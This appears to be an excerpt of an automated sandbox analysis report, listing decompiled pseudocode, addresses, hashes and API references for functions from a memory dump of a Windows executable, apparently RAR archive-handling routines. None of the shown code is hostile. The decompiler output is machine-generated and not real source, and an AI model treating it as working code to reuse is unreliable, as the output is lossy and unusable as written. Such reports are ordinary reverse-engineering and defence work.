										 *((intOrPtr*)(_t306 + 0x20)) =  *((intOrPtr*)(_t300 + 0xa220)) +  *(_t308 + 0x54);
										 *((intOrPtr*)(_t306 + 0x24)) =  *((intOrPtr*)(_t300 + 0xa224));
									}
								}
								if(( *(_t308 + 0x74) & 0x00000002) != 0) {
									_t225 = E0040B2CE(_t302);
									 *(_t308 + 0x44) = _t225;
									if((_t225 | _t302) != 0) {
										_t297 =  *((intOrPtr*)(_t308 + 0x68));
										asm("adc ecx, edx");
										 *((intOrPtr*)(_t306 + 0x30)) =  *((intOrPtr*)(_t297 + 0xa220)) +  *(_t308 + 0x44);
										 *((intOrPtr*)(_t306 + 0x34)) =  *((intOrPtr*)(_t297 + 0xa224));
									}
								}
							}
							_t135 =  *((intOrPtr*)(_t306 + 4));
							if(_t135 == 2 || _t135 == 3) {
								_t329 =  *(_t308 + 0x64);
								if(_t329 > 0 || _t329 >= 0 &&  *((intOrPtr*)(_t308 + 0x60)) > 7) {
									goto L76;
								} else {
									_t139 =  *((intOrPtr*)(_t308 + 0x60)) - 1;
									if(_t139 == 0) {
										_t140 = E0040B2CE(_t302);
										__eflags = _t140;
										if(_t140 <= 0) {
											_t141 = E0040B2CE(_t302);
											 *(_t306 + 0x10b1) = _t141 & 0x00000001;
											 *(_t306 + 0x10ba) = _t141 >> 0x00000001 & 0x00000001;
											_t145 = E0040B223(_t304) & 0x000000ff;
											 *(_t306 + 0x10dc) = _t145;
											__eflags = _t145 - 0x18;
											if(_t145 > 0x18) {
												_t110 = _t306 + 0x20; // 0x11f
												E00401C8B( *((intOrPtr*)(_t308 + 0x68)), _t110);
											}
											_t111 = _t306 + 0x1091; // 0x1190
											E0040B357(_t304, _t111, 0x10);
											_t112 = _t306 + 0x10a1; // 0x11a0
											E0040B357(_t304, _t112, 0x10);
											__eflags =  *(_t306 + 0x10b1);
											if( *(_t306 + 0x10b1) != 0) {
												_t114 = _t306 + 0x10b2; // 0x11b1
												E0040B357(_t304, _t114, 8);
												E0040B357(_t304, _t308 + 0x7c, 4);
												E004102A1(_t308 - 0x54);
												E004105A3(_t308 - 0x54, _t114, 8);
												E0041061C(_t304, _t302, __eflags, _t308 - 0x54, _t308 + 0x24);
												_t162 = E0041A4F4(_t308 + 0x7c, _t308 + 0x24, 4);
												_t310 = _t310 + 0xc;
												asm("sbb al, al");
												_t164 =  ~_t162 + 1;
												__eflags = _t164;
												 *(_t306 + 0x10b1) = _t164;
											}
											 *((char*)(_t306 + 0x1090)) = 1;
											 *((intOrPtr*)(_t306 + 0x108c)) = 5;
											 *((char*)(_t306 + 0x108b)) = 1;
										} else {
											_t105 = _t306 + 0x20; // 0x11f
											E00401C8B( *((intOrPtr*)(_t308 + 0x68)), _t105);
										}
										goto L76;
									}
									_t169 = _t139 - 1;
									if(_t169 == 0) {
										_t170 = E0040B2CE(_t302);
										__eflags = _t170;
										if(_t170 != 0) {
											goto L76;
										}
										_push(0x20);
										_t102 = _t306 + 0x1064; // 0x1163
										 *((intOrPtr*)(_t306 + 0x1060)) = 3;
										L68:
										E0040B357(_t304);
										goto L76;
									}
									_t173 = _t169 - 1;
									if(_t173 == 0) {
										__eflags = 0;
										if(0 < 0) {
											goto L76;
										}
										if(0 > 0) {
											L54:
											_t175 = E0040B2CE(_t302);
											_t240 = _t175 & 0x00000001;
											 *(_t308 + 0x77) = _t175;
											__eflags = _t175 & 0x00000002;
											if((_t175 & 0x00000002) != 0) {
												_t273 = _t304;
												__eflags = _t240;
												if(__eflags == 0) {
													_t184 = E0040B2AD(_t273, __eflags);
													_t91 = _t306 + 0x1030; // 0x112f
													E00410F33(_t91, _t184, _t302);
												} else {
													_t186 = E0040B270(_t273);
													_t90 = _t306 + 0x1030; // 0x112f
													E00410F07(_t90, _t302, _t186, 0);
												}
											}
											__eflags =  *(_t308 + 0x77) & 0x00000004;
											if(( *(_t308 + 0x77) & 0x00000004) != 0) {
												_t270 = _t304;
												__eflags = _t240;
												if(__eflags == 0) {
													_t180 = E0040B2AD(_t270, __eflags);
													_t96 = _t306 + 0x1038; // 0x1137
													E00410F33(_t96, _t180, _t302);
												} else {
													_t182 = E0040B270(_t270);
													_t95 = _t306 + 0x1038; // 0x1137
													E00410F07(_t95, _t302, _t182, 0);
												}
											}
											__eflags =  *(_t308 + 0x77) & 0x00000008;
											if(( *(_t308 + 0x77) & 0x00000008) != 0) {
												_t267 = _t304;
												__eflags = _t240;
												if(__eflags == 0) {
													_t176 = E0040B2AD(_t267, __eflags);
													_t101 = _t306 + 0x1040; // 0x113f
													E00410F33(_t101, _t176, _t302);
												} else {
													_t178 = E0040B270(_t267);
													_t100 = _t306 + 0x1040; // 0x113f
													E00410F07(_t100, _t302, _t178, 0);
												}
											}
											goto L76;
										}
										__eflags = _t237 - 9;
										if(_t237 < 9) {
											goto L76;
										}
										goto L54;
									}
									_t188 = _t173 - 1;
									if(_t188 == 0) {
										__eflags = 0;
										if(0 < 0) {
											goto L76;
										}
										if(0 > 0) {
											L49:
											E0040B2CE(_t302);
											__eflags = E0040B2CE(_t302);
											if(__eflags != 0) {
												 *((char*)(_t306 + 0x10e3)) = 1;
												E0040D452(_t308 + 0x1c, 0x14, ";%u", _t191);
												_t310 = _t310 + 0x10;
												E004107BC(__eflags,  *((intOrPtr*)(_t308 + 0x68)) + 0x57e8, _t308 + 0x1c, 0x800);
											}
											goto L76;
										}
										__eflags = _t237 - 1;
										if(_t237 < 1) {
											goto L76;
										}
										goto L49;
									}
									_t198 = _t188 - 1;
									if(_t198 == 0) {
										 *((intOrPtr*)(_t306 + 0x10f0)) = E0040B2CE(_t302);
										_t200 = E0040B2CE(_t302);
										_t280 = _t304;
										 *(_t306 + 0x20f4) = _t200 & 0x00000001;
										_t241 = E0040B2CE(_t302);
										 *((char*)(_t308 - 0x2054)) = 0;
										__eflags = _t241 - 0x1fff;
										if(_t241 < 0x1fff) {
											_t280 = _t304;
											E0040B357(_t304, _t308 - 0x2054, _t241);
											 *((char*)(_t308 + _t241 - 0x2054)) = 0;
										}
										E00409F99(_t308 - 0x2054, _t308 - 0x2054, 0x2000);
										_t81 = _t306 + 0x10f4; // 0x11f3
										E00411817(_t280, _t308 - 0x2054, _t81, 0x800);
										goto L76;
									}
									_t210 = _t198 - 1;
									if(_t210 == 0) {
										_t211 = E0040B2CE(_t302);
										 *(_t306 + 0x20f6) = _t211 >> 0x00000002 & 0x00000001;
										_t47 = _t306 + 0x20f8; // 0x21f7
										_t242 = _t47;
										 *(_t308 + 0x78) = _t211;
										 *(_t306 + 0x20f7) = _t211 >> 0x00000003 & 0x00000001;
										 *((char*)(_t306 + 0x21f8)) = 0;
										 *_t242 = 0;
										__eflags = _t211 & 0x00000001;
										if((_t211 & 0x00000001) != 0) {
											 *(_t308 + 0x74) = E0040B2CE(_t302);
											__eflags =  *(_t308 + 0x74) - 0xff;
											if( *(_t308 + 0x74) >= 0xff) {
												 *(_t308 + 0x74) = 0xff;
											}
											E0040B357(_t304, _t242,  *(_t308 + 0x74));
											 *((char*)(_t242 +  *(_t308 + 0x74))) = 0;
										}
										__eflags =  *(_t308 + 0x78) & 0x00000002;
										if(( *(_t308 + 0x78) & 0x00000002) != 0) {
											 *(_t308 + 0x74) = E0040B2CE(_t302);
											__eflags =  *(_t308 + 0x74) - 0xff;
											if( *(_t308 + 0x74) >= 0xff) {
												 *(_t308 + 0x74) = 0xff;
											}
											_t66 = _t306 + 0x21f8; // 0x22f7
											_t243 = _t66;
											E0040B357(_t304, _t243,  *(_t308 + 0x74));
											 *((char*)(_t243 +  *(_t308 + 0x74))) = 0;
										}
										__eflags =  *(_t306 + 0x20f6);
										if( *(_t306 + 0x20f6) != 0) {
											 *((intOrPtr*)(_t306 + 0x22f8)) = E0040B2CE(_t302);
										}
										__eflags =  *(_t306 + 0x20f7);
										if( *(_t306 + 0x20f7) != 0) {
											 *((intOrPtr*)(_t306 + 0x22fc)) = E0040B2CE(_t302);
										}
										 *((char*)(_t306 + 0x20f5)) = 1;
										goto L76;
									}
									if(_t210 != 1) {
										goto L76;
									}
									_t44 = _t306 + 0x1020; // 0x111f
									E00401C05(_t44, _t237);
									_push(_t237);
									_push( *((intOrPtr*)(_t306 + 0x1020)));
									goto L68;
								}
							} else {
								L76:
								 *(_t304 + 0x18) =  *(_t308 + 0x5c);
								_t133 =  *((intOrPtr*)(_t304 + 0x14)) -  *(_t304 + 0x18);
								if(_t133 >= 2) {
									continue;
								}
								break;
							}
						}
					}
				}
			}

0x00402716
0x00402717
0x00402720
0x00402726
0x00402729
0x0040272c
0x00402731
0x00402737
0x00402c30
0x00402c34
0x00402c34
0x0040273f
0x00402745
0x0040274c
0x00402750
0x00402752
0x0040275b
0x0040275e
0x00000000
0x00000000
0x00402764
0x0040276a
0x0040276c
0x00000000
0x00000000
0x00402774
0x00402777
0x00000000
0x00402787
0x00402789
0x0040278e
0x00402796
0x0040279d
0x004027a0
0x004027a3
0x004027b0
0x004027b3
0x004027b8
0x004027bd
0x004027c1
0x004027c6
0x004027cb
0x004027cd
0x004027df
0x004027e1
0x004027e4
0x004027e4
0x004027cb
0x004027eb
0x004027ef
0x004027f4
0x004027f9
0x004027fb
0x0040280d
0x0040280f
0x00402812
0x00402812
0x004027f9
0x004027eb
0x00402815
0x0040281b
0x00402826
0x0040282a
0x00000000
0x0040283c
0x0040283f
0x00402840
0x00402b23
0x00402b28
0x00402b2a
0x00402b3f
0x00402b4b
0x00402b55
0x00402b60
0x00402b63
0x00402b69
0x00402b6c
0x00402b71
0x00402b75
0x00402b75
0x00402b7c
0x00402b85
0x00402b8c
0x00402b95
0x00402b9a
0x00402ba1
0x00402ba5
0x00402bae
0x00402bbb
0x00402bc4
0x00402bd0
0x00402bdd
0x00402bec
0x00402bf1
0x00402bf6
0x00402bf8
0x00402bf8
0x00402bfa
0x00402bfa
0x00402c00
0x00402c07
0x00402c11
0x00402b2c
0x00402b2f
0x00402b33
0x00402b33
0x00000000
0x00402b2a
0x00402846
0x00402847
0x00402af5
0x00402afa
0x00402afc
0x00000000
0x00000000
0x00402b02
0x00402b04
0x00402b0a
0x00402b15
0x00402b17
0x00000000
0x00402b17
0x0040284d
0x0040284e
0x00402a2e
0x00402a30
0x00000000
0x00000000
0x00402a36
0x00402a41
0x00402a43
0x00402a4a
0x00402a4d
0x00402a50
0x00402a52
0x00402a54
0x00402a56
0x00402a58
0x00402a6f
0x00402a76
0x00402a7c
0x00402a5a
0x00402a5a
0x00402a62
0x00402a68
0x00402a68
0x00402a58
0x00402a81
0x00402a85
0x00402a87
0x00402a89
0x00402a8b
0x00402aa2
0x00402aa9
0x00402aaf
0x00402a8d
0x00402a8d
0x00402a95
0x00402a9b
0x00402a9b
0x00402a8b
0x00402ab4
0x00402ab8
0x00402abe
0x00402ac0
0x00402ac2
0x00402adc
0x00402ae3
0x00402ae9
0x00402ac4
0x00402ac4
0x00402acc
0x00402ad2
0x00402ad2
0x00402ac2
0x00000000
0x00402ab8
0x00402a38
0x00402a3b
0x00000000
0x00000000
0x00000000
0x00402a3b
0x00402854
0x00402855
0x004029ce
0x004029d0
0x00000000
0x00000000
0x004029d6
0x004029e1
0x004029e3
0x004029ef
0x004029f1
0x00402a03
0x00402a0a
0x00402a0f
0x00402a24
0x00402a24
0x00000000
0x004029f1
0x004029d8
0x004029db
0x00000000
0x00000000
0x00000000
0x004029db
0x0040285b
0x0040285c
0x0040295d
0x00402963
0x0040296a
0x0040296c
0x00402977
0x00402979
0x00402980
0x00402986
0x00402990
0x00402992
0x00402997
0x00402997
0x004029ac
0x004029b6
0x004029c4
0x00000000
0x004029c4
0x00402862
0x00402863
0x00402886
0x00402893
0x004028a1
0x004028a1
0x004028a7
0x004028aa
0x004028b0
0x004028b7
0x004028ba
0x004028bc
0x004028c5
0x004028cd
0x004028d0
0x004028d2
0x004028d2
0x004028db
0x004028e3
0x004028e3
0x004028e7
0x004028eb
0x004028f4
0x004028fc
0x004028ff
0x00402901
0x00402901
0x00402907
0x00402907
0x00402910
0x00402918
0x00402918
0x0040291c
0x00402923
0x0040292c
0x0040292c
0x00402932
0x00402939
0x00402942
0x00402942
0x00402948
0x00000000
0x00402948
0x00402866
0x00000000
0x00000000
0x0040286c
0x00402873
0x00402878
0x00402879
0x00000000
0x00402879
0x00402c18
0x00402c18
0x00402c1b
0x00402c21
0x00402c27
0x00000000
0x00000000
0x00000000
0x00402c27
0x0040281b
0x00402777
0x00402c2e

APIs

_swprintf.LIBCMT ref: 00402A0A

Strings

;%u, xrefs: 004029F8

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _swprintf
String ID: ;%u
API String ID: 589789837-535004727
Opcode ID: 2a1fd2620e9b0e8c46fcbd2d28287b17d24fe64d1ac5171822a3c506ca1d9cb0
Instruction ID: c4680877f6be678cac490a5cd9dce05a74d99ec4f5a08dff21254ca9bb74098a
Opcode Fuzzy Hash: 2a1fd2620e9b0e8c46fcbd2d28287b17d24fe64d1ac5171822a3c506ca1d9cb0
Instruction Fuzzy Hash: 31D113702043448ADB25EF75868ABEE77E5AF85304F04053FF956A72C2DBBCA884C759

Uniqueness

Uniqueness Score: -1.00%

Function 00409AF8, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00409AF8(intOrPtr _a4, intOrPtr _a8, signed char _a12) {
				char _v4100;
				char _v8196;
				short _t35;
				signed int _t38;
				short _t48;
				short _t50;
				short _t55;
				short _t56;
				signed int _t61;
				intOrPtr _t63;
				unsigned int _t66;
				signed int _t67;
				void* _t68;
				signed int _t69;

				E0041A3E0(0x2000);
				_t63 = _a4;
				_t66 = _a12;
				_t67 = _t66 & 0x0000ffff;
				_a12 = _t66 >> 0x0000001f & 0x00000001;
				if(_t67 == 0) {
					L25:
					_t63 = E0040A0CE(__eflags, _t63);
					_t68 = E0040A0CE(__eflags, _a8);
					_t35 = E004119C7(__eflags, L"__rar_", _t68, 6);
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						return 0;
					}
					_push(_a12);
					_push(_t68);
					__eflags = _t67 - 2;
					if(_t67 != 2) {
						L17:
						_push(_t63);
						return E004099D2();
					}
					_push(_t63);
					_t38 = E0040998C();
					asm("sbb eax, eax");
					return  ~_t38 + 1;
				}
				_t69 = E0041A0A7(_t63);
				if(_t67 == 2 || _t67 == 3 || E004099AD(_t63, _a8, _t69, _a12) != 0) {
					L8:
					__eflags = _t67 - 1;
					if(_t67 != 1) {
						E0040A2A1(_t63,  &_v4100, 0x800);
						E0040A2A1(_a8,  &_v8196, 0x800);
						__eflags = _t67 - 2;
						if(_t67 == 2) {
							L12:
							_t48 = E0040998C( &_v4100,  &_v8196, _a12);
							__eflags = _t48;
							if(_t48 != 0) {
								goto L9;
							}
							L13:
							__eflags = _t67 - 4;
							if(_t67 == 4) {
								L15:
								_t50 = E00409DA5( &_v4100);
								__eflags = _t50;
								if(_t50 == 0) {
									__eflags = _t67 - 4;
									if(_t67 == 4) {
										L22:
										__eflags = _v4100;
										if(__eflags == 0) {
											goto L25;
										}
										_t55 = E004099AD( &_v4100,  &_v8196, E0041A0A7( &_v4100), _a12);
										L24:
										__eflags = _t55;
										if(__eflags != 0) {
											goto L9;
										}
										goto L25;
									}
									_t56 = E00409DA5(_t63);
									__eflags = _t56;
									if(_t56 != 0) {
										goto L22;
									}
									_t55 = E0040998C( &_v4100,  &_v8196, _a12);
									goto L24;
								}
								_push(_a12);
								_push(_a8);
								goto L17;
							}
							__eflags = _t67 - 5;
							if(__eflags != 0) {
								goto L25;
							}
							goto L15;
						}
						__eflags = _t67 - 3;
						if(_t67 != 3) {
							goto L13;
						}
						goto L12;
					}
					goto L9;
				} else {
					_t61 =  *(_a8 + _t69 * 2) & 0x0000ffff;
					if(_t61 == 0x5c || _t61 == 0x2f || _t61 == 0) {
						return 1;
					} else {
						goto L8;
					}
				}
			}

0x00409b00
0x00409b06
0x00409b0b
0x00409b15
0x00409b1b
0x00409b1e
0x00409c42
0x00409c4b
0x00409c54
0x00409c5c
0x00409c61
0x00409c63
0x00409b69
0x00000000
0x00409b69
0x00409c69
0x00409c6c
0x00409c6d
0x00409c70
0x00409bd8
0x00409bd8
0x00000000
0x00409bd9
0x00409c76
0x00409c77
0x00409c7e
0x00000000
0x00409c80
0x00409b2b
0x00409b30
0x00409b64
0x00409b64
0x00409b67
0x00409b7b
0x00409b8b
0x00409b90
0x00409b93
0x00409b9a
0x00409bab
0x00409bb0
0x00409bb2
0x00000000
0x00000000
0x00409bb4
0x00409bb4
0x00409bb7
0x00409bc2
0x00409bc9
0x00409bce
0x00409bd0
0x00409be5
0x00409be8
0x00409c0c
0x00409c0c
0x00409c14
0x00000000
0x00000000
0x00409c35
0x00409c3a
0x00409c3a
0x00409c3c
0x00000000
0x00000000
0x00000000
0x00409c3c
0x00409beb
0x00409bf0
0x00409bf2
0x00000000
0x00000000
0x00409c05
0x00000000
0x00409c05
0x00409bd2
0x00409bd5
0x00000000
0x00409bd5
0x00409bb9
0x00409bbc
0x00000000
0x00000000
0x00000000
0x00409bbc
0x00409b95
0x00409b98
0x00000000
0x00000000
0x00000000
0x00409b98
0x00000000
0x00409b48
0x00409b4b
0x00409b53
0x00000000
0x00000000
0x00000000
0x00000000
0x00409b53

APIs

_wcslen.LIBCMT ref: 00409B25
_wcslen.LIBCMT ref: 00409C20

Strings

__rar_, xrefs: 00409C57

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen
String ID: __rar_
API String ID: 176396367-2561138058
Opcode ID: 937a8acef64418750f8cdf15503975f9c3acaa72dd4020a9bdd1c9835ee5bba7
Instruction ID: 98156fabbb2cba36a16788d9ae75e8335c0ca924c25f2bbd9852fc784478d63d
Opcode Fuzzy Hash: 937a8acef64418750f8cdf15503975f9c3acaa72dd4020a9bdd1c9835ee5bba7
Instruction Fuzzy Hash: 9941A172A0020966DF216A65DC41AEF336EBF45364F04047BF809B3293E63DED918669

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9E9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040A9E9(intOrPtr* __ecx, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t15;
				intOrPtr _t18;
				signed int _t22;
				intOrPtr _t25;
				signed int _t28;
				void* _t33;
				intOrPtr _t34;
				intOrPtr* _t36;

				_t12 = _a4;
				_t36 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) + _t12;
				_t25 =  *((intOrPtr*)(__ecx + 4));
				if(_t25 >  *((intOrPtr*)(__ecx + 8))) {
					_t13 =  *((intOrPtr*)(__ecx + 0xc));
					_push(_t33);
					if(_t13 != 0 && _t25 > _t13) {
						E0040634C(_t25, 0x432a6c, L"Maximum allowed array size (%u) is exceeded", _t13);
						E004062F7(0x432a6c);
					}
					_t15 = ( *(_t36 + 8) >> 2) +  *(_t36 + 8) + 0x20;
					_t28 =  *(_t36 + 4);
					_t22 = _t28;
					_t45 = _t28 - _t15;
					if(_t28 <= _t15) {
						_t22 = _t15;
					}
					_push(_t22 * 0x28);
					_push( *_t36);
					_t18 = E00419E8C(_t22, _t33, _t36, _t45);
					_t34 = _t18;
					if(_t34 == 0) {
						_t18 = E004062F7(0x432a6c);
					}
					 *_t36 = _t34;
					 *(_t36 + 8) = _t22;
					return _t18;
				}
				return _t12;
			}

0x0040a9e9
0x0040a9ee
0x0040a9f0
0x0040a9f3
0x0040a9f9
0x0040a9fb
0x0040aa00
0x0040aa08
0x0040aa15
0x0040aa1f
0x0040aa1f
0x0040aa2c
0x0040aa30
0x0040aa33
0x0040aa35
0x0040aa37
0x0040aa39
0x0040aa39
0x0040aa40
0x0040aa41
0x0040aa43
0x0040aa48
0x0040aa4e
0x0040aa52
0x0040aa52
0x0040aa57
0x0040aa5b
0x00000000
0x0040aa5e
0x0040aa60

APIs

_realloc.LIBCMT ref: 0040AA43

Part of subcall function 0040634C: __vswprintf_c_l.LIBCMT ref: 0040636A

Strings

Maximum allowed array size (%u) is exceeded, xrefs: 0040AA0F
l*C, xrefs: 0040AA01

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __vswprintf_c_l_realloc
String ID: Maximum allowed array size (%u) is exceeded$l*C
API String ID: 620378156-1053225679
Opcode ID: 3d0128460e65cceda7bdcb961cb0efa9d75947c8a6dedc3a4d7a3d384b876c00
Instruction ID: 6be46f9955c74b4efa5f92da86b9dabde319961fc14a5292e70f9676f65d8158
Opcode Fuzzy Hash: 3d0128460e65cceda7bdcb961cb0efa9d75947c8a6dedc3a4d7a3d384b876c00
Instruction Fuzzy Hash: 150184757407015FD728EA29D99192BB3D9DB88318310443FE89BD7BC1EA78AC60CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004125B2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004125B2(intOrPtr* __ecx, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t15;
				intOrPtr _t18;
				signed int _t22;
				intOrPtr _t25;
				signed int _t28;
				void* _t33;
				intOrPtr _t34;
				intOrPtr* _t36;

				_t12 = _a4;
				_t36 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) + _t12;
				_t25 =  *((intOrPtr*)(__ecx + 4));
				if(_t25 >  *((intOrPtr*)(__ecx + 8))) {
					_t13 =  *((intOrPtr*)(__ecx + 0xc));
					_push(_t33);
					if(_t13 != 0 && _t25 > _t13) {
						E0040634C(_t25, 0x432a6c, L"Maximum allowed array size (%u) is exceeded", _t13);
						E004062F7(0x432a6c);
					}
					_t15 = ( *(_t36 + 8) >> 2) +  *(_t36 + 8) + 0x20;
					_t28 =  *(_t36 + 4);
					_t22 = _t28;
					_t45 = _t28 - _t15;
					if(_t28 <= _t15) {
						_t22 = _t15;
					}
					_push(_t22 << 4);
					_push( *_t36);
					_t18 = E00419E8C(_t22, _t33, _t36, _t45);
					_t34 = _t18;
					if(_t34 == 0) {
						_t18 = E004062F7(0x432a6c);
					}
					 *_t36 = _t34;
					 *(_t36 + 8) = _t22;
					return _t18;
				}
				return _t12;
			}

0x004125b2
0x004125b7
0x004125b9
0x004125bc
0x004125c2
0x004125c4
0x004125c9
0x004125d1
0x004125de
0x004125e8
0x004125e8
0x004125f5
0x004125f9
0x004125fc
0x004125fe
0x00412600
0x00412602
0x00412602
0x00412609
0x0041260a
0x0041260c
0x00412611
0x00412617
0x0041261b
0x0041261b
0x00412620
0x00412624
0x00000000
0x00412627
0x00412629

APIs

_realloc.LIBCMT ref: 0041260C

Part of subcall function 0040634C: __vswprintf_c_l.LIBCMT ref: 0040636A

Strings

Maximum allowed array size (%u) is exceeded, xrefs: 004125D8
l*C, xrefs: 004125CA

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __vswprintf_c_l_realloc
String ID: Maximum allowed array size (%u) is exceeded$l*C
API String ID: 620378156-1053225679
Opcode ID: 49999cd464890587c31be26e3659f1ed6192c0eb8a45263fea63129f7eaf4304
Instruction ID: 37aefb5f2393fa4296514ed1eb8f05db036594fc3af0cfde6b97514f287d1875
Opcode Fuzzy Hash: 49999cd464890587c31be26e3659f1ed6192c0eb8a45263fea63129f7eaf4304
Instruction Fuzzy Hash: BC0184757003015F9768EA19D99196BB3D9DB84754310443FE99BC3B81EA78BC90C758

Uniqueness

Uniqueness Score: -1.00%

Function 0041251D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041251D(intOrPtr* __ecx, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t15;
				intOrPtr _t18;
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				signed int _t33;
				intOrPtr* _t35;

				_t12 = _a4;
				_t35 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) + _t12;
				_t25 =  *((intOrPtr*)(__ecx + 4));
				if(_t25 >  *((intOrPtr*)(__ecx + 8))) {
					_t13 =  *((intOrPtr*)(__ecx + 0xc));
					_push(_t21);
					if(_t13 != 0 && _t25 > _t13) {
						E0040634C(_t25, 0x432a6c, L"Maximum allowed array size (%u) is exceeded", _t13);
						E004062F7(0x432a6c);
					}
					_t14 =  *(_t35 + 8);
					_t33 =  *(_t35 + 4);
					_t15 = ( *(_t35 + 8) >> 2) + _t14 + 0x20;
					_t44 = _t33 - _t15;
					if(_t33 <= _t15) {
						_t33 = _t15;
					}
					_push(_t33 << 2);
					_push( *_t35);
					_t18 = E00419E8C(_t21, _t33, _t35, _t44);
					_t22 = _t18;
					if(_t22 == 0) {
						_t18 = E004062F7(0x432a6c);
					}
					 *(_t35 + 8) = _t33;
					 *_t35 = _t22;
					return _t18;
				}
				return _t12;
			}

0x0041251d
0x00412522
0x00412524
0x00412527
0x0041252d
0x0041252f
0x00412532
0x0041253c
0x00412549
0x00412553
0x00412553
0x00412558
0x0041255b
0x00412563
0x00412567
0x00412569
0x0041256b
0x0041256b
0x00412572
0x00412573
0x00412575
0x0041257a
0x00412580
0x00412584
0x00412584
0x00412589
0x0041258e
0x00000000
0x00412590
0x00412592

APIs

_realloc.LIBCMT ref: 00412575

Part of subcall function 0040634C: __vswprintf_c_l.LIBCMT ref: 0040636A

Strings

Maximum allowed array size (%u) is exceeded, xrefs: 00412543
l*C, xrefs: 00412535

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __vswprintf_c_l_realloc
String ID: Maximum allowed array size (%u) is exceeded$l*C
API String ID: 620378156-1053225679
Opcode ID: 16aba9e6fa4d11a976ad9858f1f8b829e0221b7472de39c8a6f4fd2a4d9fb021
Instruction ID: 762c0d76d86886c894a62f4d4f2151d82c4518d7a3f8e7ed89643610044096e2
Opcode Fuzzy Hash: 16aba9e6fa4d11a976ad9858f1f8b829e0221b7472de39c8a6f4fd2a4d9fb021
Instruction Fuzzy Hash: 000184713003025F9724EA5AD5A196BB3DADB84354311443FE997C3741DA78FC958758

Uniqueness

Uniqueness Score: -1.00%

Function 004011B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004011B4(intOrPtr* __ecx, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t13;
				intOrPtr _t14;
				unsigned int _t16;
				intOrPtr _t18;
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				unsigned int _t33;
				intOrPtr* _t35;

				_t13 = _a4;
				_t35 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) + _t13;
				_t25 =  *((intOrPtr*)(__ecx + 4));
				if(_t25 >  *((intOrPtr*)(__ecx + 8))) {
					_t14 =  *((intOrPtr*)(__ecx + 0xc));
					_push(_t21);
					if(_t14 != 0 && _t25 > _t14) {
